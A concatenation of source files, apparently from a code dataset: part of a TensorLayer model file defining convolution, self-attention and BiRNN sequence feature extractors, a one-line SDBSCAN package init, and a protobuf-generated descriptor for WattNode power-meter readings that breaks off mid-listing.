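# BiRNNLayer concatenates the forward and backward hidden states, so each time step should carry 2 * 32 = 64 features before flattening (assuming TensorLayer 1.x BiRNNLayer semantics).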
#MaxPool1d
features = FlattenLayer(fin_features, name='flatten_features')
#features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
#hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(features, 2, act = None, name = 'predicting')
return category, fin_features
def sharedFeatureExtractor3(t_sequences, name, reuse = False, is_train = True):
'''
Use attention to replace the LSTM layer
'''
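# Flow sketch (descriptive summary added for readability): embedding ->
# three parallel Conv1d branches with dilation rates 1, 2 and 4 (the dilated
# branches approximate gapped k-mers) -> concat -> residual conv block ->
# self-attention over the forward and the reversed sequence -> concat.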
w_init = tf.random_normal_initializer(stddev=0.2)
b_init = None
g_init = tf.random_normal_initializer(1., 0.2)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
embedding = EmbeddingInputlayer(sequences, 5, 32)
#return sequences, sequences.outputs
#return sequences
# use a larger kernel size for the first layer
feature1 = Conv1d(embedding, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
'''
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True)
'''
# dilated convolution used to simulate gapped k-mers
feature2 = Conv1d(embedding, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
'''
if config.TRAIN.DROPOUT:
feature2 = DropoutLayer(feature2, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features2', is_fix = True)
'''
feature3 = Conv1d(embedding, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
'''
if config.TRAIN.DROPOUT:
feature3 = DropoutLayer(feature3, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features3', is_fix = True)
'''
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
'''
if config.TRAIN.DROPOUT:
con_features = DropoutLayer(con_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features4', is_fix = True)
'''
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuress1', is_fix = True)
'''
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss2', is_fix = True)
'''
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss3', is_fix = True)
'''
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacked bi-directional LSTM block (left commented out below; self-attention is used instead)
'''
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
'''
def my_rev(inputs):
return tf.reverse(inputs, [1])
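# tf.reverse on axis 1 flips the time dimension, giving the second attention branch a reversed-sequence view of the same features.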
rev_features = LambdaLayer(features, my_rev, name ='reverse')
rev_features = SelfAttentionLayer(rev_features, 8 , 128,name='rev_self-attention')
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense_rev'}, name='time_dense_rev')
#DenseLayer(hidden, 2, act = None, name = 'predicting')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
features = ConcatLayer([features, rev_features], name = 'attention_concat')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
def AttentionSeqs(t_sequences, name, is_train= True, reuse = False):
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
embedding = EmbeddingInputlayer(sequences, 5, 32)
def my_rev(inputs):
return tf.reverse(inputs, [1])
def pe(inputs):
return Position_Embedding(inputs, 32)
rev_features = LambdaLayer(embedding, my_rev, name ='reverse')
rev_pos_embed = LambdaLayer(rev_features, pe, name='rev_position-embedding')
rev_features = ConcatLayer([rev_features, rev_pos_embed], name = 'rev_embedding_concat')
for i in range(6):
rev_features = SelfAttentionLayer(rev_features, 8 , 128,name='rev_self-attention%d'%i)
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
rev_features = Conv1d(rev_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = tf.nn.relu, name = 'rev_conv_125_%d'%i)
pos_embed = LambdaLayer(embedding, pe, name='position-embedding')
features = ConcatLayer([pos_embed, embedding], name = 'embedding_concat')
for i in range(6):
features = SelfAttentionLayer(features, 8 , 128,name='self-attention%d'%i)
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = tf.nn.relu, name = 'conv_125_%d'%i)
features = ConcatLayer([rev_features, features], name = 'fwd_rev_concat')
return features, features.outputs
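# Minimal usage sketch (commented out; assumes integer-encoded sequences with a
# vocabulary of 5 symbols, matching EmbeddingInputlayer above; 'attn_demo' is a
# hypothetical scope name):
# t_seqs = tf.placeholder(tf.int64, [None, config.TRAIN.TIME_STEPS])
# attn_net, attn_out = AttentionSeqs(t_seqs, 'attn_demo', is_train=False)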
def sharedFeatureExtractor_nodropout(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# use a larger kernel size for the first layer
feature1 = Conv1d(sequences, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
# dilated convolution used to simulate gapped k-mers
feature2 = Conv1d(sequences, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
feature3 = Conv1d(sequences, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# bi-directional LSTM (one layer is active here; a second stacked layer is commented out below)
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
if __name__ == '__main__':
'''
test model building
'''
print('model testing!')
sequences = tf.placeholder(tf.float32, [None, config.TRAIN.TIME_STEPS, config.TRAIN.EMBED_DIM])
selecting, _ = sharedFeatureExtractor(sequences, 'extractor')
category = classifier(selecting, 'classifier')
#print(category.all_params)
print('printing layers')
print(category.all_params)
#category.print_params(False)
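# Inference-time sketch (an assumption, not part of the original test): the
# graph would typically be rebuilt with reuse=True and is_train=False so that
# BatchNorm and Dropout switch to evaluation behaviour, e.g.:
# eval_selecting, _ = sharedFeatureExtractor(sequences, 'extractor', reuse=True, is_train=False)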
[per-file metric and quality-signal columns omitted]
768ecf7fe5e4ea51a244b9131d649e7996b3a191 | 39 | py | Python | __init__.py | tommylee3003/SDBSCAN @ b7b1f5f5aacdd2bdd69935ede58bd61cc6121a9c | ["MIT"] | stars: 3 (2020-08-26 -- 2021-05-30) | issues: null | forks: 2 (2021-02-15 -- 2021-08-04)
from .sdbscan import SDBSCAN, sdbscan
[per-file metric and quality-signal columns omitted]
769587de87f5ff3e55f9d39633a93aa40aea45d6 | 31,960 | py | Python | python/pyxbos/pyxbos/wattnode_pb2.py | anandkp92/xboswave @ f7d8a72cde048a21422f9d0838374b83b1b6a256 | ["BSD-3-Clause"] | stars: null | issues: null | forks: 3 (2019-02-05 -- 2019-03-25)
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: wattnode.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import nullabletypes_pb2 as nullabletypes__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='wattnode.proto',
package='xbospb',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0ewattnode.proto\x12\x06xbospb\x1a\x13nullabletypes.proto\"\x93\x10\n\rWattnodeState\x12!\n\tEnergySum\x18\x01 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyPosSum\x18\x02 \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergySumNR\x18\x03 \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0e\x45nergyPosSumNr\x18\x04 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08PowerSum\x18\x05 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerA\x18\x06 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerB\x18\x07 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerC\x18\x08 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tVoltAvgLN\x18\t \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltA\x18\n \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltB\x18\x0b \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltC\x18\x0c \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tVoltAvgLL\x18\r \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltAB\x18\x0e \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltBC\x18\x0f \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltAC\x18\x10 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1c\n\x04\x46req\x18\x11 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyA\x18\x12 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyB\x18\x13 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyC\x18\x14 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosA\x18\x15 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosB\x18\x16 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosC\x18\x17 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyNegSum\x18\x18 \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0e\x45nergyNegSumNR\x18\x19 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegA\x18\x1a \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegB\x18\x1b \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegC\x18\x1c \x01(\x0b\x32\x0e.xbospb.Double\x12%\n\rEnergyReacSum\x18\x1d \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacA\x18\x1e \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacB\x18\x1f \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacC\x18 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyAppSum\x18! \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppA\x18\" \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppB\x18# \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppC\x18$ \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0ePowerFactorAvg\x18% \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorA\x18& \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorB\x18\' \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorC\x18( \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerReacSum\x18) \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacA\x18* \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacB\x18+ \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacC\x18, \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0bPowerAppSum\x18- \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppA\x18. \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppB\x18/ \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppC\x18\x30 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentA\x18\x31 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentB\x18\x32 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentC\x18\x33 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06\x44\x65mand\x18\x34 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandMin\x18\x35 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandMax\x18\x36 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandApp\x18\x37 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandA\x18\x38 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandB\x18\x39 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandC\x18: \x01(\x0b\x32\x0e.xbospb.Double\x12\x0c\n\x04time\x18; \x01(\x04\x62\x06proto3')
,
dependencies=[nullabletypes__pb2.DESCRIPTOR,])
_WATTNODESTATE = _descriptor.Descriptor(
name='WattnodeState',
full_name='xbospb.WattnodeState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='EnergySum', full_name='xbospb.WattnodeState.EnergySum', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosSum', full_name='xbospb.WattnodeState.EnergyPosSum', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergySumNR', full_name='xbospb.WattnodeState.EnergySumNR', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosSumNr', full_name='xbospb.WattnodeState.EnergyPosSumNr', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerSum', full_name='xbospb.WattnodeState.PowerSum', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerA', full_name='xbospb.WattnodeState.PowerA', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerB', full_name='xbospb.WattnodeState.PowerB', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerC', full_name='xbospb.WattnodeState.PowerC', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAvgLN', full_name='xbospb.WattnodeState.VoltAvgLN', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltA', full_name='xbospb.WattnodeState.VoltA', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltB', full_name='xbospb.WattnodeState.VoltB', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltC', full_name='xbospb.WattnodeState.VoltC', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAvgLL', full_name='xbospb.WattnodeState.VoltAvgLL', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAB', full_name='xbospb.WattnodeState.VoltAB', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltBC', full_name='xbospb.WattnodeState.VoltBC', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAC', full_name='xbospb.WattnodeState.VoltAC', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Freq', full_name='xbospb.WattnodeState.Freq', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyA', full_name='xbospb.WattnodeState.EnergyA', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyB', full_name='xbospb.WattnodeState.EnergyB', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyC', full_name='xbospb.WattnodeState.EnergyC', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosA', full_name='xbospb.WattnodeState.EnergyPosA', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosB', full_name='xbospb.WattnodeState.EnergyPosB', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosC', full_name='xbospb.WattnodeState.EnergyPosC', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegSum', full_name='xbospb.WattnodeState.EnergyNegSum', index=23,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegSumNR', full_name='xbospb.WattnodeState.EnergyNegSumNR', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegA', full_name='xbospb.WattnodeState.EnergyNegA', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegB', full_name='xbospb.WattnodeState.EnergyNegB', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegC', full_name='xbospb.WattnodeState.EnergyNegC', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacSum', full_name='xbospb.WattnodeState.EnergyReacSum', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacA', full_name='xbospb.WattnodeState.EnergyReacA', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacB', full_name='xbospb.WattnodeState.EnergyReacB', index=30,
number=31, type=11, cpp_type=10, label=1,
